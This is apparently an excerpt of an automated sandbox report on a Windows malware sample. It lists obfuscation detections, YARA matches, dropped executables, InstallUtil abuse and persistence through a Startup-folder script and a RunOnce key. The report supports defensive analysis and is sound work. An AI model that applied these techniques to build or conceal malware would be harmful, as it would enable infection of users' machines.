                  Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbps source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ?HoC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, YSPvguVwPoZuGH59OUX.cs.Net Code: Type.GetTypeFromHandle(QJNfCFtP437ujS306F5.hiY14dNiNh(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(QJNfCFtP437ujS306F5.hiY14dNiNh(16777252)),Type.GetTypeFromHandle(QJNfCFtP437ujS306F5.hiY14dNiNh(16777284))})
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, eEMbGORUaTTyJOqnkhL.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: seniorcommunicate.exe.0.dr, ReaderDatabaseFilter.cs.Net Code: FindTokenizer System.Reflection.Assembly.Load(byte[])
                  Source: cvchost.exe.1.dr, ReaderDatabaseFilter.cs.Net Code: FindTokenizer System.Reflection.Assembly.Load(byte[])
                  Source: 1.2.seniorcommunicate.exe.6ee0000.12.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 1.2.seniorcommunicate.exe.6ee0000.12.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 1.2.seniorcommunicate.exe.6ee0000.12.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 1.2.seniorcommunicate.exe.6ee0000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 1.2.seniorcommunicate.exe.6ee0000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, rjm77BLgSlS4gfsq4b.cs.Net Code: JvjkJaQCYv0LSdAlKTW System.AppDomain.Load(byte[])
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 1.2.seniorcommunicate.exe.4bd7ba8.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 1.2.seniorcommunicate.exe.4bd7ba8.3.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 1.2.seniorcommunicate.exe.4bd7ba8.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 1.2.seniorcommunicate.exe.4bd7ba8.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 1.2.seniorcommunicate.exe.4bd7ba8.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: Yara matchFile source: 1.2.seniorcommunicate.exe.6fb0000.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.seniorcommunicate.exe.4a9df48.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.2539050952.0000000006FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2524102736.0000000003363000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: seniorcommunicate.exe PID: 6752, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3796, type: MEMORYSTR
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D1D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF71D1D1D28
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_0793616F push ebp; iretd 1_2_07936170
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00B426D5 push cs; retf 6_2_00B426DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_051F350F pushad ; retf 6_2_051F3510
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_051F3177 push cs; iretd 6_2_051F317A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_051F3D6F push ss; ret 6_2_051F3D72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_051F081A push BFFFFFF8h; retf 0000h6_2_051F0824
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_051F07C6 push edx; retf 6_2_051F07D4
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, jy2mWCZnI5vwjv8QrFU.csHigh entropy of concatenated method names: 'OmZZOneVVd', 'nK6Z9j48bC', 'ePsZ46K7mT', 'UsSZYNpIAH', 'TO7Zeu420t', 'mV4ZUCrCAf', 'GuTZuLqtZ5', 'aywZ0fvYxx', 'JFPZklxUBM', 'IhJZ73P67O'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'gbPy6AgqfFLsPNioGdC'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, q6VvtRGP7t4wqeILix1.csHigh entropy of concatenated method names: 'TmEGD92LuW', 'diOGHlM7y6', 'hJqGwmSTIQ', 'oyMGdBYKKp', 'X4RGIK7NhV', 'w5ayf7dL6HTZcRRWKnb', 'jnHfnNdYWmpjK0gqJLT', 'UMIN3lde6ZxoX0JVG15', 'OtRVDNdUG7OJu6bP5ec', 'R74fEcduYp2LAQQg2a6'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, FDsVfXVeHoYlGhgf0FK.csHigh entropy of concatenated method names: 'hlCVuYBguG', 'uboV01jsDq', 'vC1nqQTwcre5f9aoCSC', 't7n7hOTdlBwGUy9twMW', 'VJIjkoTIajx0ZOLTgNW', 'bIYth1TT3O1ggxZnpe9', 'umn8L1Tg4crah4YhEO0', 'legFRjTmXrGhRgQ8NlB', 'wXrHULTvnqboyFdNYOc', 'bA5rYMTpYWS0XDyhr09'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, SE8nFDtdDofHflqtUYD.csHigh entropy of concatenated method names: 'lWptsYiAcm', 'TOktSBGxPG', 'Vo5tfxc1El', 'DEFtFSfPSA', 'RnRt8cOCUL', 'OXQtW9AVKB', 'UDAtXCwA0V', 'IFgtBO6GHc', 'wWdtC52Hyh', 'XwxtbTQ21d'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, QJNfCFtP437ujS306F5.csHigh entropy of concatenated method names: 'hiY14dNiNh', 'rTS1LsftI5', 'T7wyahmLtIWhbxxQ4JM', 'MkmbMamYQDTCehhaLot', 'FYniXWmeFEQW71U4hlh', 'v253lhmUI4Yxcsa6bEp', 'g837BbmuPn9ukT6Afd1', 'Hnt2Dym0BIEZU5TJqtV'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, mGJBCYtzHu6W7XgA2oQ.csHigh entropy of concatenated method names: 'YByUr9LA4s', 'f6GUNDHeQU', 'GKCURcVXNH', 'jOAU62wmaq', 'fKMUKambQH', 'stUUQqPCDq', 'bByUEVTQUF', 'fuv9jjWqas', 'WL5U3ElJIs', 'SufUPfaNBd'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, YSPvguVwPoZuGH59OUX.csHigh entropy of concatenated method names: 'yUWAHhgAHkHV2l6NGoF', 'T9FJuDg5couh1kMSaKb', 'clYttBsqAd', 'H66yUXgsWsDI71Z8FZN', 'elLqZegScOhYW2vS2qs', 'wII13wgfjutPtwYcdfv', 'MO5kLpgFGqh0oIlAEA4', 'YF4Evrg8o462YBEphWm', 'XdofJjgWaLZFZYvCBXx', 'XldlCSgXDjPmVQSZPi0'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, rjm77BLgSlS4gfsq4b.csHigh entropy of concatenated method names: 'crJq5byk6', 'dPLTJhQAY', 'wAbXx6Jm9', 'nJWbElMuk', 'Yq5ASBhXe', 'SHtOMM9H0', 'drF0wlVL2', 'gCdIqsfevJbWougkCJ5', 'XwITJ5fP65HI6IdsrVV', 'CipxiwfzNhb6ZWEkV48'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, N9fDDdoBjLZYFXgP1np.csHigh entropy of concatenated method names: 'qnQozf540E', 'wa9fCEBTBJ', 'Rs4fGfxmc1', 'eC2fRgRtbP', 'IHffnv7H6b', 'TXifo9HfTi', 'U5lfftRQxo', 'kO3fQ8n8wg', 'X9EfEBKi8e', 'rjqf7eFeri'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, lVPThIaqfiNX7UqKFF.csHigh entropy of concatenated method names: 'NcSRFn0JjC', 'ur5Ricsuf1', 'EBVyvW7SZmZ0WniwjyU', 'pvQYnx7tfocMs5ZxhhC', 'mKkJt07Yfc9kjM1Ho6o', 'Fqal8u73ZeNjSAA44uM', 'KZGodp7hm6aITlwJRYN', 'aLOR1RpLrA', 'uf0Rd6EtyF', 'InvKTe7k8eKEisGgJf0'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, eEMbGORUaTTyJOqnkhL.csHigh entropy of concatenated method names: 'lOQx8Ec8phekNreOQyO', 'Ck3ibLcMBcOWabwqWf2', 'q8GouYikdw', 'nxNKBScsFwawOjU5inF', 'u876amcITsUM8oLJaTn', 'GWLQGlc2nOaVC5PZE7u', 'xyy4wMcxNjWx3LBsKkl', 'HgyE2Ececk9tuoKoj4Y', 'KuTRc3cPZntP8rorkkB', 'R1SKcRczJSdUIE3w0j8'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, Eu8dK5ihrKEXZHH1sc.csHigh entropy of concatenated method names: 'eNkuQQyFu', 'lsl1MlhOM', 'rJJdYke5v', 'PMX5UL5Pi', 'S1KtQ9Q6MaUWOTTTGv5', 'VUGm0qQkDTvXjTMPiGE', 'R1mGFdQgMbV3ItawtnN', 'xtp9eIQvYFCpw78WYOI', 'CmWnD7QNjJhYqW79aLK', 'BCWmIaQ9ndUEIS45UKS'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, ful7MIR8qft3Twvnwvq.csHigh entropy of concatenated method names: 'BSXwGZLLAA', 'XfHVqIcggxKn1JZBEk6', 'H7a4AAc9SLqVcqtLcVI', 'XoU4K3crqI0Fmu2gv4j', 'AtV1EccmekmXljUHME6', 'WhY5QacpIAe3oHrjV5b', 'nEy4pJc6UaMoB6LtqOC', 'ACTlIKck68mWSHK0EHg', 'D09U1ecDMdmPGihYxxe', 'QhUTVAcWKPcTZPBionr'
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeFile created: C:\Users\user\AppData\Local\cvchost.exeJump to dropped file
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeJump to dropped file
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D1684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF71D1D1684

                  Boot Survival

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cvchost.vbsJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cvchost.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cvchost.vbsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
